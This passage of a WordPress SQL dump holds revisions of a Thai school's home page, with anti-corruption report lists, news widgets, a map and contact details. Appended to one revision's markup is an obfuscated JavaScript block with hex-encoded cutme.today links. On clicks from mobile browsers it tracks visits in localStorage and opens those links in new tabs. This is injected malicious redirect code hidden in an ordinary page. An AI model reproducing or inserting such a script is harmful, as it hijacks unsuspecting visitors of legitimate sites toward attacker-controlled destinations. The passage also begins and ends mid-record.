Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 11:59:44','2024-08-07 04:59:44','',14,'http://pakhaeng.ssk.in.th/?p=641',0,'revision','',0),
(642,1,'2024-08-07 13:56:03','2024-08-07 06:56:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsscho